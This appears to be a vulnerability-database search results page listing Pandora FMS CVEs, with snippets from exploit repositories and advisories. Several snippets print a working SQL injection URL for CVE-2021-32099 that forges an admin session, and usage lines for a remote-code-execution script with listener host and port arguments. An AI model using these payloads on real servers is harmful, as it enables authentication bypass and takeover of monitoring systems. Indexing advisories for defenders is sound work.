Lucene search
+L

1012 matches found

Kitploit
Kitploit
added 2026/09/08 12:24 a.m.6 views

exploit-CVE-2020-5844

CVE-2020-5844 利用程序 Pandora FMS v7.0NG.742 - 远程代码执行 喜欢这个仓库?给我们一个 ⭐! 仅供教育和授权的安全研究使用。 漏洞利用作者 @UNICORDev 由 @NicPWNs 和 @Dev-Yeoj 编写 漏洞描述 Pandora FMS v7.0 NG 中的 index.php?sec=godmode/extensions&sec2=extensions/filesrepo 允许经过身份验证的管理员上传恶意 PHP 脚本,并通过 base64 解码文件位置来执行这些脚本。这影响 v7.0NG.742FIXPERL2020。 利用程序描述...

7.2CVSS7.8AI score0.30254EPSS
SaveExploits6References5
Kitploit
Kitploit
added 2026/09/07 9:12 p.m.11 views

CVE-2022-45436

CVE-2022-45436 在 pandorafms 漏洞标题:反射型跨站脚本攻击 日期:2023年2月15日 漏洞作者:Damodar Naik 厂商主页:https://pandorafms.com/en/ 软件链接:https://github.com/pandorafms/pandorafms 版本: 测试平台:Ubuntu CVE 编号:CVE-2022-45436 复现步骤 1. 通过点击...

6.1CVSS5.7AI score0.00614EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/07 11:19 a.m.4 views

CVE-2024-11320

CVE-2024-11320 Exploit para la ejecución remota de código en Pandora FMS CVE-2024-11320...

9.8CVSS8.1AI score0.91046EPSS
SaveExploits2
Nuclei
Nuclei
added 2026/09/07 6:34 a.m.25 views

Pandora FMS <=7.0NG.722 - Remote Code Execution

Pandora FMS versions =7.0NG.722 are vulnerable to unauthenticated remote code execution by chaining an unrestricted file upload CVE-2018-11221 and a local file inclusion CVE-2018-11222. An attacker can upload a malicious PHP file as a plugin and execute it via LFI, leading to full compromise of t...

9.8CVSS7.8AI score0.06534EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/07 4:24 a.m.6 views

pandorafms_7.44

Pandora FMS 7.44 CVE-2020-13851 Pandora FMS 7.44 CVE-2020-13851 RCE 允许经过身份验证的用户通过事件功能实现远程命令执行。可以使用凭据或 PHP 会话 cookie 进行操作。 开始使用 执行程序 使用凭据 root@kitploit: python3 pandorafms7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337 使用 PHP 会话 cookie root@kitploit: python...

9CVSS7.9AI score0.90993EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/03 1:36 a.m.9 views

CVE-2021-32099

CVE-2021-32099 CVE-2021-32099 POC : http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=a%27%20UNION%20SELECT%20%27a%27,1,%27idusuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessionsphp%20WHERE%20%271%27=%271 详情 :...

9.8CVSS8.1AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/03 1:19 a.m.8 views

CVE-2021-32099_SQLi

CVE-2021-32099 SQLi 绕过登录 在尝试读取 Pandora.htb 上的 User Flag 时非常有用 CVE-2021-32099 SQLi 允许攻击者绕过登录。 目标 利用目标:Pandora FMS v7.0NG.742FIXPERL2020 分析 从 cvedetail 中读取。我们知道目标端点:http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=PayloadHere = 访问被拒绝。 sqlmap -r req.txt -p sessionid...

9.8CVSS8.2AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/03 1:19 a.m.6 views

CVE-2021-32099

CVE-2021-32099 pandora fms 742 sqli pre authentication POC root@kitploit: http://localhost/pandoraconsole/include/chartgenerator.php?sessionid=a' UNION SELECT 'a',1,'idusuario|s:5:"admin";' as data FROM tsessionsphp WHERE '1'='1 URL Encoded root@kitploit:...

9.8CVSS8.2AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/02 3:18 a.m.9 views

CVE-2021-32099

poc : http://127.0.0.1:8888/pandoraconsole/include/chartgenerator.php?sessionid=%27%20union%20SELECT%201,2,%27idusuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained...

9.8CVSS8.8AI score0.12708EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/01 2:03 a.m.5 views

CVE-2021-32099

CVE-2021-32099 PoC 本仓库提供了针对 CVE-2021-32099 漏洞的概念验证(PoC)漏洞利用代码,该漏洞影响 Pandora FMS 742 。该漏洞利用演示了未经身份验证的攻击者如何利用 SQL 注入漏洞将会话从非特权级别提升到管理员级别。获得管理权限后,攻击者可通过 Pandora FMS File Manager 上传任意 PHP 文件,从而实现远程代码执行,并以 Web 服务器用户身份入侵服务器。 ⚠️ 免责声明 本项目仅用于教育、研究和经授权的安全测试目的 。 请勿在你不拥有或未经明确许可的系统上使用此代码。 作者不对 任何损坏或误用负责 。 安装...

9.8CVSS8AI score0.12708EPSS
SaveExploits2
OSV
OSV
added 2026/08/17 9:00 p.m.7 views

CVE-2026-75531 Stored Cross-Site Scripting in URL Observables via Lookyloo Submission Handler in Pandora

Pandora contains a stored cross-site scripting XSS vulnerability in the rendering of URL observables. A URL extracted from or associated with an analyzed file was inserted directly into the inline JavaScript onclick handler used by the Submit to Lookyloo action. Although the value was subject to...

7CVSS5.4AI score
SaveExploits0References4
RedhatCVE
RedhatCVE
added 2026/06/05 7:22 p.m.23 views

CVE-2026-34187

Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via graph container parameter. This issue affects Pandora FMS: from 777 through 800...

9.8CVSS5.7AI score0.00274EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.19 views

CVE-2026-30810

Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800...

8.8CVSS5.5AI score0.00302EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.19 views

CVE-2026-30805

Insecure Default Initialization of Resource vulnerability allows Authentication Bypass via API access. This issue affects Pandora FMS: from 777 through 800...

9.1CVSS5.5AI score0.00341EPSS
SaveExploits0References1
RedhatCVE
RedhatCVE
added 2026/06/05 7:21 p.m.20 views

CVE-2026-30807

Cross-Site Request Forgery vulnerability allows an attacker to perform unauthorized actions via crafted web page. This issue affects Pandora FMS: from 777 through 800...

8.8CVSS5.5AI score0.00144EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/05/12 6:30 p.m.26 views

EUVD-2026-29512

Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via graph container parameter. This issue affects Pandora FMS: from 777 through 800...

7.6CVSS5.9AI score0.00274EPSS
SaveExploits0References2
EUVD
EUVD
added 2026/05/12 6:30 p.m.34 views

EUVD-2026-29497

Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800...

7.1CVSS5.8AI score0.00302EPSS
SaveExploits0References2
EUVD
EUVD
added 2026/05/12 6:30 p.m.59 views

EUVD-2026-29494

Insecure Default Initialization of Resource vulnerability allows Authentication Bypass via API access. This issue affects Pandora FMS: from 777 through 800...

9.1CVSS5.8AI score0.00341EPSS
SaveExploits0References2
EUVD
EUVD
added 2026/05/12 6:30 p.m.21 views

EUVD-2026-29495

Cross-Site Request Forgery vulnerability allows an attacker to perform unauthorized actions via crafted web page. This issue affects Pandora FMS: from 777 through 800...

7.1CVSS5.8AI score0.00144EPSS
SaveExploits0References2
EUVD
EUVD
added 2026/05/12 6:30 p.m.26 views

EUVD-2026-29496

Session Fixation vulnerability allows Session Hijacking via crafted session ID. This issue affects Pandora FMS: from 777 through 800...

7.6CVSS5.8AI score0.00267EPSS
SaveExploits0References2
Rows per page
Query Builder